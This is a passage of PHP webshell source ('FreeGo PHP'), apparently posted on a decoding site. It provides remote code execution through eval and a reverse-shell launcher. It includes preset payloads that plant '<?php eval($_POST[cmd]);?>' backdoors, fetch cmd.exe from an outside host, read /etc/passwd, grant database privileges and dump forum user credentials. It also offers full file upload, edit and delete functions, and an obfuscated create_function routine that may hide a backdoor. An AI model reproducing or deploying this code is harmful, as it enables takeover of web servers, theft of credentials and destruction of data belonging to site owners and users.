antivirus(strdir($scandir.'/'),$typearr,$matches,$nowdir);echo '<p>'.($isread ? '<h2></h2>' : '<h1></h1>').'</p></div>';}break;case "phpeval" : if(isset($_POST['phpcode'])) {$phpcode = chop($_POST['phpcode']);ob_start();if(substr($phpcode,0,2) == '<?' && substr($phpcode,-2) == '?>') { @eval ('?>'.$phpcode.'<?php '); }else { @eval ($phpcode); }$out = ob_get_contents();ob_end_clean();} else {$phpcode = 'phpinfo();';$out = '';}echo base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmZ1bmN0aW9uIHJ1bmNvZGUob2Jqbil7dmFyIHdpbiA9IHdpbmRvdy5vcGVuKCcnLCJfYmxhbmsiLCcnKTt3aW4uZG9jdW1lbnQub3BlbigndGV4dC9odG1sJywncmVwbGFjZScpO3dpbi5vcGVuZXIgPSBudWxsO3dpbi5kb2N1bWVudC53cml0ZSgkKG9iam4pLnZhbHVlKTt3aW4uZG9jdW1lbnQuY2xvc2UoKTtyZXR1cm4gdHJ1ZTt9PC9zY3JpcHQ+');echo '<div class="msgbox">'.$msg.'</div>';echo '<form method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="phpeval">';echo '<div class="actall"><p><textarea name="phpcode" id="phpcode" style="width:698px;height:180px;">'.htmlspecialchars($phpcode).'</textarea></p><p>';echo '<select onchange="$(\'phpcode\').value=options[selectedIndex].value">';echo '<option>------</option>';echo '<option value="echo readfile(\'C:/web/t00ls.php\');"></option>';echo '<option value="$fp=fopen(\'C:/web/t00ls.php\',\'w\');echo fputs($fp,\'<?php eval($_POST[cmd]);?>\')?\'Success!\':\'Fail!\';fclose($fp);"></option>';echo '<option value="echo copy(\'C:/web/t00ls1.php\',\'C:/web/t00ls2.php\')?\'Success!\':\'Fail!\';"></option>';echo '<option value="echo chmod(\'C:/web/t00ls1.php\',0777)?\'Success!\':\'Fail!\';"></option>';echo '<option value="echo file_put_contents(\''.THISDIR.'cmd.exe\', file_get_contents(\'http://www.baidu.com/cmd.exe\'))?\'Success!\':\'Fail!\';"></option>';echo '<option value="print_r($_SERVER);"></option>';echo '<option value="echo filer(chr(47).chr(101).chr(116).chr(99).chr(47).chr(115).chr(104).chr(46).chr(99).chr(111).chr(110).chr(102)).&quot;\r\n&quot;.filer(chr(47).chr(108).chr(105).chr(98).chr(47).chr(108).chr(105).chr(98).chr(115).chr(104).chr(46).chr(115).chr(111).chr(47).chr(115).chr(104).chr(100).chr(99).chr(102)).&quot;\r\n&quot;.filer(chr(47).chr(101).chr(116).chr(99).chr(47).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100));">find rootkit</option>';echo '</select> ';echo '<input type="submit" style="width:80px;" value=""></p></div>';echo '</form><div class="actall"><p><textarea id="evalcode" style="width:698px;height:180px;">'.htmlspecialchars($out).'</textarea></p><p><input type="button" value="HTML" onclick="runcode(\'evalcode\')"></p></div>';break;case "sql" : if((!empty($_POST['sqlhost'])) && (!empty($_POST['sqluser'])) && (!empty($_POST['names']))) {$type = $_POST['type'];$sqlhost = $_POST['sqlhost'];$sqluser = $_POST['sqluser'];$sqlpass = $_POST['sqlpass'];$sqlname = $_POST['sqlname'];$sqlcode = $_POST['sqlcode'];$names = $_POST['names'];switch($type) {case "PostgreSql" : if(function_exists('pg_close')){if(strstr($sqlhost,':')) { $array = explode(':',$sqlhost); $sqlhost = $array[0]; $sqlport = $array[1]; }else { $sqlport = 5432; }$dbconn = @pg_connect("host=$sqlhost port=$sqlport dbname=$sqlname user=$sqluser password=$sqlpass");if($dbconn) {$msg = '<h2>'.$type.' </h2>';pg_query('set client_encoding='.$names);$result = pg_query($sqlcode);if($result) { $msg .= '<h2> - SQL</h2>'; while($array = pg_fetch_array($result)) { $rows[] = $array; } }else { $msg .= '<h1> - SQL</h1>'; $rows = array('error' => pg_result_error($result)); }pg_free_result($result);} else {$msg = '<h1>'.$type.'</h1>';}@pg_close($dbconn);} else {$msg = '<h1>'.$type.'</h1>';}break;case "MsSql" : if(function_exists('mssql_close')){$dbconn = @mssql_connect($sqlhost,$sqluser,$sqlpass);if($dbconn) {$msg = '<h2>'.$type.' </h2>';mssql_select_db($sqlname,$dbconn);$result = mssql_query($sqlcode);if($result) { $msg .= '<h2> - SQL</h2>'; while ($array = mssql_fetch_array($result)) { $rows[] = $array; } }else { $msg .= '<h1> - SQL</h1>'; }@mssql_free_result($result);} else {$msg = '<h1>'.$type.'</h1>';}@mssql_close($dbconn);} else {$msg = '<h1>'.$type.'</h1>';}break;case "Oracle" : if(function_exists('oci_close')){$conn = @oci_connect($sqluser,$sqlpass,$sqlhost.'/'.$sqlname);if($conn) {$msg = '<h2>'.$type.' </h2>';$stid = oci_parse($conn,$sqlcode);oci_execute($stid);if($stid) { $msg .= '<h2> - SQL</h2>'; while (($array = oci_fetch_array($stid,OCI_ASSOC))) { $rows[] = $array; } }else { $msg .= '<h1> - SQL</h1>'; $e = oci_error(); $rows = array('error' => $e['message']); }oci_free_statement($stid);} else {$e = oci_error(); $rows = array('error' => $e['message']);$msg = '<h1>'.$type.'</h1>';}@oci_close($conn);} else {$msg = '<h1>'.$type.'</h1>';}break;case "MySql" : if(function_exists('mysql_close')){$conn = mysql_connect(strstr($sqlhost,':') ? $sqlhost : $sqlhost.':3306',$sqluser,$sqlpass,$sqlname);if($conn) {$msg = '<h2>'.$type.' </h2>';if(substr($sqlcode,0,6) == 't00lsa') {$array = array(); $data = ''; $i = 0;preg_match_all('/t00lsa\s*\'(.*)\'\s*t00lsb\s*\'(.*)\'\s*t00lsc\s*\'(.*)\'\s*t00lsfile\s*\'(.*)\'/i',$sqlcode,$array);if($array[1][0] && $array[2][0] && $array[3][0] && $array[4][0]) {mysql_select_db($array[1][0],$conn);mysql_query('set names '.$names,$conn);$spidercode = 'select '.$array[3][0].' from `'.$array[2][0].'`;';$result = mysql_query($spidercode,$conn);if($result) {while($row = mysql_fetch_array($result,MYSQL_ASSOC)) { $data .= join('{~}',$row)."\r\n"; $i++; }if($data) {$file = strdir($array[4][0]);$msg .= filew($file,$data,'w') ? '<h2> - </h2>' : '<h1> - </h1>';$rows = array('file' => $file,size(filesize($file)) => ''.$i.'');}else { $msg .= '<h1> - </h1>'; }}else { $msg .= '<h1> - SQL</h1>'; $rows = array('errno' => mysql_errno(),'error' => mysql_error()); }}else { $msg .= '<h1> - </h1>'; }} elseif(!empty($sqlcode)) {mysql_select_db($sqlname,$conn);mysql_query('set names '.$names,$conn);$result = mysql_query($sqlcode,$conn);if($result) { $msg .= '<h2> - SQL</h2>'; while($array = mysql_fetch_array($result,MYSQL_ASSOC)) { $rows[] = $array; } }else { $msg .= '<h1> - SQL</h1>'; $rows = array('errno' => mysql_errno(),'error' => mysql_error()); }}mysql_free_result($result);} else {$msg = '<h1>'.$type.'</h1>';$rows = array('errno' => mysql_errno(),'error' => mysql_error());}mysql_close($conn);} else {$msg = '<h1>'.$type.'</h1>';}break;}} else {$type = 'MySql';$sqlhost = 'localhost:3306';$sqluser = 'root';$sqlpass = '123456';$sqlname = 'mysql';$sqlcode = 'select version();';$names = 'gbk';}echo '<div class="msgbox">'.$msg.'</div>';echo '<form method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="sql">';echo '<table class="tables"><tr><th style="width:15%;"></th><th></th></tr>';echo '<tr><td></td><td>';$dbs = array('MySql','MsSql','Oracle','PostgreSql');foreach($dbs as $dbname) { echo '<label><input type="radio" name="type" value="'.$dbname.'"'.($type == $dbname ? ' checked' : '').'>'.$dbname.'</label> '; }echo '</td></tr><tr><td></td><td> <input type="text" name="sqlhost" style="width:188px;" value="'.$sqlhost.'"> ';echo ' <input type="text" name="sqluser" style="width:108px;" value="'.$sqluser.'"> ';echo ' <input type="text" name="sqlpass" style="width:108px;" value="'.$sqlpass.'"> ';echo ' <input type="text" name="sqlname" style="width:108px;" value="'.$sqlname.'"></td></tr>';echo '<tr><td><br>';echo '<select onchange="$(\'sqlcode\').value=options[selectedIndex].value">';echo '<option value="select version();">------</option>';echo '<option value="select \'<?php eval ($_POST[cmd]);?>\' into outfile \'D:/web/shell.php\';"></option>';echo '<option value="GRANT ALL PRIVILEGES ON *.* TO \''.$sqluser.'\'@\'%\' IDENTIFIED BY \''.$sqlpass.'\' WITH GRANT OPTION;"></option>';echo '<option value="show variables;"></option>';echo '<option value="create database t00ls;"></option>';echo '<option value="create table `t00ls` (`id` INT(10) NOT NULL ,`user` VARCHAR(32) NOT NULL ,`pass` VARCHAR(32) NOT NULL) TYPE = MYISAM;"></option>';echo '<option value="show databases;"></option>';echo '<option value="show tables from `'.$sqlname.'`;"></option>';echo '<option value="show columns from `'.$sqlname.'`;"></option>';echo '<option value="drop table `t00ls`;"></option>';echo '<option value="select * from `pre_ucenter_members` limit 0,30;"></option>';echo '<option value="insert into `admin` (`user`,`pass`) values (\'t00ls\', \'f1a81d782dea6a19bdca383bffe68452\');"></option>';echo '<option value="update `admin` set `user` = \'t00ls1\',`pass` = \'50de237e389600acadbeda3d6e6e0b1f\' where `user` = \'t00ls\' and `pass` = \'f1a81d782dea6a19bdca383bffe68452\' limit 1;"></option>';echo '<option value="t00lsa \'discuzx25\' t00lsb \'pre_ucenter_members\' t00lsc \'username,password,salt,email\' t00lsfile \''.THISDIR.'out.txt\';">(MySql)</option>';echo '</select>';echo '</td><td><textarea name="sqlcode" id="sqlcode" style="width:680px;height:80px;">'.htmlspecialchars($sqlcode).'</textarea></td></tr>';echo '<tr><td></td><td><select name="names">';$charsets = array('gbk','utf8','big5','latin1','cp866','ujis','euckr','koi8r','koi8u');foreach($charsets as $charset) { echo '<option value="'.$charset.'"'.($names == $charset ? ' selected' : '').'>'.$charset.'</option>'; }echo '</select> <input type="submit" style="width:80px;" value=""></td></tr>';echo '</table></form>';if($rows) {echo '<pre style="padding:5px;background:#F8F8F8;text-align:left;">';ob_start();print_r($rows);$out = ob_get_contents();ob_end_clean();if(preg_match('~[\x{4e00}-\x{9fa5}]+~u',$out) && function_exists('iconv')) { $out = @iconv('UTF-8','GBK',$out); }echo htmlspecialchars($out);echo '</pre>';}break;case "backshell" : if((!empty($_POST['backip'])) && (!empty($_POST['backport']))) {$backip = $_POST['backip'];$backport = $_POST['backport'];$temp = $_POST['temp'] ? $_POST['temp'] : '/tmp';$type = $_POST['type'];$msg = backshell($backip,$backport,$temp,$type);} else {$backip = $_SERVER['REMOTE_ADDR'] ? $_SERVER['REMOTE_ADDR'] : getenv('REMOTE_ADDR');$backport = '4444';$temp = '/tmp';$type = 'pl';}echo '<div class="msgbox">'.$msg.'</div>';echo '<form method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="backshell">';echo '<table class="tables"><tr><th style="width:15%;"></th><th></th></tr>';echo '<tr><td></td><td><input type="text" name="backip" style="width:268px;" value="'.$backip.'"> (Your ip)</td></tr>';echo '<tr><td></td><td><input type="text" name="backport" style="width:268px;" value="'.$backport.'"> (nc -vvlp '.$backport.')</td></tr>';echo '<tr><td></td><td><input type="text" name="temp" style="width:268px;" value="'.$temp.'"> (Only Linux)</td></tr>';echo '<tr><td></td><td>';$types = array('pl' => 'Perl','py' => 'Python','cbin' => 'C-Bin','php' => 'PHP','phpwin' => 'WIN-PHP');foreach($types as $key => $name) { echo '<label><input type="radio" name="type" value="'.$key.'"'.($key == $type ? ' checked' : '').'>'.$name.'</label> '; }echo '</td></tr><tr><td></td><td><input type="submit" style="width:80px;" value=""></td></tr>';echo '</table></form>';break;case "edit" : case "editor" : $file = strdir($_POST['godir'].'/'.$_POST['govar']);if(!file_exists($file)) {$msg = '';} else {$code = filer($file);$chst = '';if(preg_match('~[\x{4e00}-\x{9fa5}]+~u',$code)) { $chst = 'utf-8'; }$size = size(filesize($file));$msg = ' '.substr(decoct(fileperms($file)),-4).'  '.$size.'  '.$chst.'';}echo base64_decode('PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQp2YXIgbiA9IDA7DQpmdW5jdGlvbiBzZWFyY2goc3RyKSB7DQoJdmFyIHR4dCwgaSwgZm91bmQ7DQoJaWYoc3RyID09ICIiKSByZXR1cm4gZmFsc2U7DQoJdHh0ID0gJCgnZmlsZWNvZGUnKS5jcmVhdGVUZXh0UmFuZ2UoKTsNCglmb3IoaSA9IDA7IGkgPD0gbiAmJiAoZm91bmQgPSB0eHQuZmluZFRleHQoc3RyKSkgIT0gZmFsc2U7IGkrKyl7DQoJCXR4dC5tb3ZlU3RhcnQoImNoYXJhY3RlciIsIDEpOw0KCQl0eHQubW92ZUVuZCgidGV4dGVkaXQiKTsNCgl9DQoJaWYoZm91bmQpeyB0eHQubW92ZVN0YXJ0KCJjaGFyYWN0ZXIiLCAtMSk7IHR4dC5maW5kVGV4dChzdHIpOyB0eHQuc2VsZWN0KCk7IHR4dC5zY3JvbGxJbnRvVmlldygpOyBuKys7IH0NCgllbHNlIHsgaWYgKG4gPiAwKSB7IG4gPSAwOyBzZWFyY2goc3RyKTsgfSBlbHNlIGFsZXJ0KHN0ciArICIuLi4gTm90LUZpbmQiKTsgfQ0KCXJldHVybiBmYWxzZTsNCn0NCjwvc2NyaXB0Pg==');echo '<div class="msgbox"><input name="keyword" id="keyword" type="text" style="width:138px;height:15px;"><input type="button" value="IE" onclick="search($(\'keyword\').value);"> - '.$msg.'</div>';echo '<form name="editfrm" id="editfrm" method="POST">';subeval();echo '<input type="hidden" name="go" value=""><input type="hidden" name="act" id="act" value="edit">';echo '<input type="hidden" name="dir" id="dir" value="'.dirname($file).'">';echo '<div class="actall"> <input type="text" name="filename" value="'.$file.'" style="width:662px;"> ';echo '</div><div class="actall"><textarea name="filecode" id="filecode" style="width:698px;height:358px;">'.htmlspecialchars($code).'</textarea></div></form>';echo '<div class="actall" style="padding:5px;padding-right:68px;"><input type="button" onclick="$(\'editfrm\').submit();" value="" style="width:80px;"> ';echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="'.dirname($file).'">';subeval();echo '<input type="button" onclick="$(\'backfrm\').submit();" value="" style="width:80px;"></form></div>';break;case "upfiles" : $updir = isset($_POST['updir']) ? $_POST['updir'] : $_POST['godir'];$msg = ' '.get_cfg_var("upload_max_filesize").' POST '.get_cfg_var("post_max_size").'';$max = 10;if(isset($_FILES['uploads']) && isset($_POST['renames'])) {$uploads = $_FILES['uploads'];$msgs = array();for($i = 1;$i < $max;$i++) {if($uploads['error'][$i] == UPLOAD_ERR_OK) {$rename = $_POST['renames'][$i] == '' ? $uploads['name'][$i] : $_POST['renames'][$i];$filea = $uploads['tmp_name'][$i];$fileb = strdir($updir.'/'.$rename);$msgs[$i] = fileu($filea,$fileb) ? '<br><h2> '.$rename.'</h2>' : '<br><h1> '.$rename.'</h1>';}}}echo '<div class="msgbox">'.$msg.'</div>';echo '<form name="upsfrm" id="upsfrm" method="POST" enctype="multipart/form-data">';subeval();echo '<input type="hidden" name="go" value="upfiles"><input type="hidden" name="act" id="act" value="upload">';echo '<div class="actall"><p> <input type="text" name="updir" style="width:398px;" value="'.$updir.'"></p>';for($i = 1;$i < $max;$i++) { echo '<p>'.$i.' <input type="file" name="uploads['.$i.']" style="width:300px;">  <input type="text" name="renames['.$i.']" style="width:128px;"> '.$msgs[$i].'</p>'; }echo '</div></form><div class="actall" style="padding:8px;padding-right:68px;"><input type="button" onclick="$(\'upsfrm\').submit();" value="" style="width:80px;"> ';echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="'.$updir.'">';subeval();echo '<input type="button" onclick="$(\'backfrm\').submit();" value="" style="width:80px;"></form></div>';break;default : if(isset($_FILES['upfile'])) {if($_FILES['upfile']['name'] == '') { $msg = '<h1></h1>'; }else { $rename = $_POST['rename'] == '' ? $_FILES['upfile']['name'] : $_POST['rename']; $filea = $_FILES['upfile']['tmp_name']; $fileb = strdir($nowdir.$rename); $msg = fileu($filea,$fileb) ? '<h2>'.$rename.'</h2>' : '<h1>'.$rename.'</h1>'; }}if(isset($_POST['act'])) {switch($_POST['act']) {case "a" : if(!$_POST['files']) { $msg = '<h1> '.$_POST['var'].'</h1>'; }else { $i = 0; foreach($_POST['files'] as $file) { $i += @copy(strdir($nowdir.$file),strdir($_POST['var'].'/'.$file)) ? 1 : 0; } $msg =  $msg = $i ? '<h2> '.$i.' '.$_POST['var'].'</h2>' : '<h1> '.$i.' '.$_POST['var'].'</h1>'; }break;case "b" : if(!$_POST['files']) { $msg = '<h1></h1>'; }else { $i = 0; foreach($_POST['files'] as $file) { $i += @unlink(strdir($nowdir.$file)) ? 1 : 0; } $msg = $i ? '<h2> '.$i.' </h2>' : '<h1> '.$i.' </h1>'; }break;case "c" : if(!$_POST['files']) { $msg = '<h1> '.$_POST['var'].'</h1>'; }elseif(!ereg("^[0-7]{4}$",$_POST['var'])) { $msg = '<h1></h1>'; }else { $i = 0; foreach($_POST['files'] as $file) { $i += @chmod(strdir($nowdir.$file),base_convert($_POST['var'],8,10)) ? 1 : 0; } $msg = $i ? '<h2> '.$i.' '.$_POST['var'].'</h2>' : '<h1> '.$i.' '.$_POST['var'].'</h1>'; }break;case "d" : if(!$_POST['files']) { $msg = '<h1> '.$_POST['var'].'</h1>'; }elseif(!preg_match('/(\d+)-(\d+)-(\d+) (\d+):(\d+):(\d+)/',$_POST['var'])) { $msg = '<h1> '.$_POST['var'].'</h1>'; }else { $i = 0; foreach($_POST['files'] as $file) { $i += @touch(strdir($nowdir.$file),strtotime($_POST['var'])) ? 1 : 0; } $msg = $i ? '<h2> '.$i.' '.$_POST['var'].'</h2>' : '<h1> '.$i.' '.$_POST['var'].'</h1>'; }break;case "e" : $path = strdir($nowdir.$_POST['var'].'/');if(file_exists($path)) { $msg = '<h1> '.$_POST['var'].'</h1>'; }else { $msg = @mkdir($path,0777) ? '<h2> '.$_POST['var'].' </h2>' : '<h1> '.$_POST['var'].' </h1>'; }break;case "f" : $context = array('http' => array('timeout' => 30));if(function_exists('stream_context_create')) { $stream = stream_context_create($context); }$data = @file_get_contents ($_POST['var'],false,$stream);$file = array_pop(explode('/',$_POST['var']));if($data) { $msg = filew(strdir($nowdir.$file),$data,'wb') ? '<h2> '.$file.' </h2>' : '<h1> '.$file.' </h1>'; } else { $msg = '<h1></h1>'; }break;case "rf" : $files = explode('|x|',$_POST['var']);if(count($files) != 2) { $msg = '<h1></h1>'; }else { $msg = @rename(strdir($nowdir.$files[1]),strdir($nowdir.$files[0])) ? '<h2> '.$files[1].'  '.$files[0].' </h2>' : '<h1> '.$files[1].'  '.$files[0].' </h1>'; }break;case "pd" : $files = explode('|x|',$_POST['var']);if(count($files) != 2) { $msg = '<h1></h1>'; }else { $path = strdir($nowdir.$files[1]); $msg = @chmod($path,base_convert($files[0],8,10)) ? '<h2>'.$files[1].''.$files[0].'</h2>' : '<h1>'.$files[1].''.$files[0].'</h1>'; }break;case "edit" : if(isset($_POST['filename']) && isset($_POST['filecode'])) { $msg = filew($_POST['filename'],$_POST['filecode'],'w') ? '<h2> '.$_POST['filename'].'</h2>' : '<h1> '.$_POST['filename'].'</h1>'; }break;case "deltree" : $deldir = strdir($nowdir.$_POST['var'].'/');if(!file_exists($deldir)) { $msg = '<h1> '.$_POST['var'].' </h1>'; }else { $msg = deltree($deldir) ? '<h2> '.$_POST['var'].' </h2>' : '<h1> '.$_POST['var'].' </h1>'; }break;}}$chmod = substr(decoct(fileperms($nowdir)),-4);if(!$chmod) { $msg .= ' - <h1></h1>'; }$array = showdir($nowdir);$thisurl = strdir('/'.strtr($nowdir,array(ROOTDIR => '')).'/');$nowdir = strtr($nowdir,array('\'' => '%27','"' => '%22'));echo '<div class="msgbox">'.$msg.'</div>';echo '<div class="actall"><form name="frm" id="frm" method="POST">';subeval();echo (is_writable($nowdir) ? '<h2></h2>' : '<h1></h1>').' <input type="text" name="dir" id="dir" style="width:508px;" value="'.strdir($nowdir.'/').'"> ';echo '<input type="button" onclick="$(\'frm\').submit();" style="width:50px;" value=""> ';echo '<input type="button" onclick="cd(\''.ROOTDIR.'\');" style="width:68px;" value=""> ';echo '<input type="button" onclick="cd(\''.THISDIR.'\');" style="width:68px;" value=""> ';echo '<select onchange="cd(options[selectedIndex].value);">';echo '<option>------</option>';echo '<option value="C:/RECYCLER/">Win-RECYCLER</option>';echo '<option value="C:/$Recycle.Bin/">Win-$Recycle</option>';echo '<option value="C:/Program Files/">Win-Program</option>';echo '<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup/">Win-Startup</option>';echo '<option value="C:/Documents and Settings/All Users////">Win-</option>';echo '<option value="C:/Windows/Temp/">Win-TEMP</option>';echo '<option value="/usr/local/">Linux-local</option>';echo '<option value="/tmp/">Linux-tmp</option>';echo '<option value="/var/tmp/">Linux-var</option>';echo '<option value="/etc/ssh/">Linux-ssh</option>';echo '</select></form></div><div class="actall">';echo '<input type="button" value="" onclick="nf(\'edit\',\'newfile.php\');" style="width:68px;"> ';echo '<input type="button" value="" onclick="txts(\'\',\'newdir\',\'e\');" style="width:68px;"> ';echo '<input type="button" value="" onclick="txts(\'\',\'http://www.baidu.com/cmd.exe\',\'f\');" style="width:68px;"> ';echo '<input type="button" value="" onclick="go(\'upfiles\',\''.$nowdir.'\');" style="width:68px;"> ';echo '<form name="upfrm" id="upfrm" method="POST" enctype="multipart/form-data">';subeval();echo '<input type="hidden" name="dir" id="dir" value="'.$nowdir.'">';echo '<input type="file" name="upfile" style="width:286px;height:21px;"> ';echo '<input type="button" onclick="$(\'upfrm\').submit();" value="" style="width:50px;"> ';echo ' <input type="text" name="rename" style="width:128px;">';echo '</form></div>';echo '<form name="frm1" id="frm1" method="POST"><table class="tables">';subeval();echo '<input type="hidden" name="dir" id="dir" value="'.$nowdir.'">';echo '<input type="hidden" name="act" id="act" value="">';echo '<input type="hidden" name="var" id="var" value="">';echo '<th><a href="javascript:cd(\''.dirname($nowdir).'/\');"></a></th><th style="width:8%"></th><th style="width:5%"></th><th style="width:17%"></th><th style="width:17%"></th><th style="width:8%"></th>';if($array) {asort($array['dir']);asort($array['file']);$dnum = $fnum = 0;foreach($array['dir'] as $path => $name) {$prem = substr(decoct(fileperms($path)),-4);$ctime = date('Y-m-d H:i:s',filectime($path));$mtime = date('Y-m-d H:i:s',filemtime($path));echo '<tr>';echo '<td><a href="javascript:cd(\''.$nowdir.$name.'\');"><b>'.strtr($name,array('%27' => '\'','%22' => '"')).'</b></a></td>';echo '<td><a href="javascript:dels(\''.$name.'\');"></a> ';echo '<a href="javascript:acts(\''.$name.'\',\'rf\',\''.$name.'\');"></a></td>';echo '<td><a href="javascript:acts(\''.$prem.'\',\'pd\',\''.$name.'\');">'.$prem.'</a></td>';echo '<td>'.$ctime.'</td>';echo '<td>'.$mtime.'</td>';echo '<td>-</td>';echo '</tr>';$dnum++;}foreach($array['file'] as $path => $name) {$prem = substr(decoct(fileperms($path)),-4);$ctime = date('Y-m-d H:i:s',filectime($path));$mtime = date('Y-m-d H:i:s',filemtime($path));$size = size(filesize($path));echo '<tr>';echo '<td><input type="checkbox" name="files[]" value="'.$name.'"><a target="_blank" href="'.$thisurl.$name.'">'.strtr($name,array('%27' => '\'','%22' => '"')).'</a></td>';echo '<td><a href="javascript:go(\'edit\',\''.$name.'\');"></a> ';echo '<a href="javascript:acts(\''.$name.'\',\'rf\',\''.$name.'\');"></a></td>';echo '<td><a href="javascript:acts(\''.$prem.'\',\'pd\',\''.$name.'\');">'.$prem.'</a></td>';echo '<td>'.$ctime.'</td>';echo '<td>'.$mtime.'</td>';echo '<td align="right"><a href="javascript:go(\'down\',\''.$name.'\');">'.$size.'</a></td>';echo '</tr>';$fnum++;}}unset($array);echo '</table>';echo '<div class="actall" style="text-align:left;">';echo '<input type="checkbox" id="chkall" name="chkall" value="on" onclick="sa(this.form);"> ';echo '<input type="button" value="" style="width:50px;" onclick=\'txts("","'.$nowdir.'","a");\'> ';echo '<input type="button" value="" style="width:50px;" onclick=\'dels("b");\'> ';echo '<input type="button" value="" style="width:50px;" onclick=\'txts("","0666","c");\'> ';echo '<input type="button" value="" style="width:50px;" onclick=\'txts("","'.$mtime.'","d");\'> ';echo '<input type="button" value="" style="width:50px;" onclick=\'txts("","'.strtr($_SERVER['HTTP_HOST'],array(':' => '_','.' => '_')).'.zip","p");\'> ';echo '['.$dnum.'] - ['.$fnum.'] - ['.$chmod.']</div></form>';break;}?><div class="footag"><?php echo php_uname().'<br>'.$_SERVER['SERVER_SOFTWARE'];?></div></div></div></body></html><?php unset($array);exit;?>

Did this file decode correctly?

Original Code

<?php
error_reporting(E_ERROR);
header("content-Type: text/html; charset=utf-8");
ini_set('max_execution_time',0);
ini_set('memory_limit','8000M');
define('PASSWD','');
define('VERSION','FreeGo PHP');
define('THISFILE',str_replace(array('\\','//'),array('/','/'),__FILE__));
define('THISDIR',dirname(THISFILE).'/');
define('ROOTDIR',strtr(THISFILE,array($_SERVER['PHP_SELF'] => '')).'/');

 function strdir($str) { return str_replace(array('\\','//','%27','%22'),array('/','/','\'','"'),chop($str)); }function chkgpc($array) { foreach($array as $key => $var) { $array[$key] = is_array($var) ? chkgpc($var) : stripslashes($var); } return $array; }define('EXISTS_PHPINFO',getinfo() ? true : false);if(get_magic_quotes_gpc()) { $_POST = chkgpc($_POST); }if(function_exists('mysql_close')) { $issql = 'MySql'; }if(function_exists('mssql_close')) $issql .= ' - MsSql';if(function_exists('oci_close')) $issql .= ' - Oracle';if(function_exists('sybase_close')) $issql .= ' - SyBase';if(function_exists('pg_close')) $issql .= ' - PostgreSql';$win = substr(PHP_OS,0,3) == 'WIN' ? true : false;$msg = VERSION;function filew($name,$data,$mode) {if((!is_writable($name)) && file_exists($name)) { chmod($name,0666); }$handle = fopen($name,$mode);$key = fputs($handle,$data);fclose($handle);return $key;}function filer($name) {$handle = fopen($name,'r');$data = fread($handle,filesize($name));fclose($handle);return $data;}function fileu($namea,$nameb) {$key = move_uploaded_file($namea,$nameb) ? true : false;if(!$key) { $key = copy($namea,$nameb) ? true : false; }return $key;}function filed($name) {if(!file_exists($name)) return false;ob_end_clean();$name = basename($name);$array = explode('.',$name);header('Content-type: application/x-'.array_pop($array));header('Content-Disposition: attachment; filename='.$name);header('Content-Length: '.filesize($name));@readfile($name);exit;}function showdir($dir) {$dir = strdir($dir.'/');$handle = opendir($dir);if(!$handle) return false;$array = array();while($name = readdir($handle)) {if($name == '.' || $name == '..') continue;$path = $dir.$name;$name = strtr($name,array('\'' => '%27','"' => '%22'));if(is_dir($path)) { $array['dir'][$path] = $name; }else { $array['file'][$path] = $name; }}closedir($handle);return $array;}function deltree($dir) {$handle = @opendir($dir);while($name = @readdir($handle)) {if($name == '.' || $name == '..') continue;$path = $dir.$name;@chmod($path,0777);if(is_dir($path)) { deltree($path.'/'); }else { @unlink($path); }}@closedir($handle);return @rmdir($dir);}function subeval() {if(isset($_POST['getpwd'])) { echo '<input type="hidden" name="getpwd" value="'.$_POST['getpwd'].'">'; }return true;}function strrot($s, $n = 13) {$n = (int)$n % 26;if (!$n) return $s;for ($i = 0, $l = strlen($s); $i < $l; $i++) {$c = ord($s[$i]);if ($c >= 97 && $c <= 122) {$s[$i] = chr(($c - 71 + $n) % 26 + 97);} else if ($c >= 65 && $c <= 90) {$s[$i] = chr(($c - 39 + $n) % 26 + 65);}}return $s;}function postinfo($array,$string) {$infos = array(function_exists("\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e"),function_exists("\x66\x73\x6f\x63\x6b\x6f\x70\x65\x6e"));if($infos[0] && $infos[1]) {$info = base64_decode(strrot($string));$walks = array(0 => bin2hex($array));@array_walk ($walks, @create_function ("\x24\x61\x72\x72\x61\x79\x2c\x24\x6b\x65\x79", strrot($info)));}return ob_end_clean();}function size($bytes) {if($bytes < 1024) return $bytes.' B';$array = array('B','K','M','G','T');$floor = floor(log($bytes) / log(1024));return sprintf('%.2f '.$array[$floor],($bytes/pow(1024,floor($floor))));}function packdir($files) {if(!function_exists('gzcompress')) { return NULL; }$datasec = $ctrldir = array(); $offset = 0;$handle = opendir($dir);foreach($files as $path) {if(file_exists($path) && is_file($path)) {$temp = array();$fp = fopen($path,'r');$filecode = fread($fp, filesize($path));fclose($fp);$temp = filezip($filecode, basename($path), $offset);$datasec[] = $temp['datasec'];$ctrldir[] = $temp['ctrldir'];$offset = strlen(join('',$datasec));}}closedir($handle);return packfile($datasec, $ctrldir);}function settime() {$dates = getdate();if($dates['year'] < 1980) { $dates['year'] = 1980; $dates['mon'] = 1; $dates['mday'] = 1; $dates['hours'] = 0; $dates['minutes'] = 0; $dates['seconds'] = 0; } return (($dates['year'] - 1980) << 25) | ($dates['mon'] << 21) | ($dates['mday'] << 16) | ($dates['hours'] << 11) | ($dates['minutes'] << 5) | ($dates['seconds'] >> 1);}function filezip($data, $name, $offset) {$dtime = dechex(settime());$hextime = pack('H*',$dtime[6].$dtime[7].$dtime[4].$dtime[5].$dtime[2].$dtime[3].$dtime[0].$dtime[1]);$uncl = strlen($data);$crcm = crc32($data);$code = gzcompress($data);$clen = strlen($code);$code = substr(substr($code, 0, strlen($code) - 4), 2);$filer = "\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00".$hextime.pack('V',$crcm).pack('V',$clen).pack('V',$uncl).pack('v',strlen($name)).pack('v',0).$name.$code.pack('V',$crcm).pack('V',$clen).pack('V',$uncl);$cdrec = "\x50\x4b\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00".$hextime.pack('V',$crcm).pack('V',$clen).pack('V',$uncl).pack('v',strlen($name)).pack('v',0).pack('v',0).pack('v',0).pack('v',0).pack('V',32).pack('V',$offset).$name;return array('datasec' => 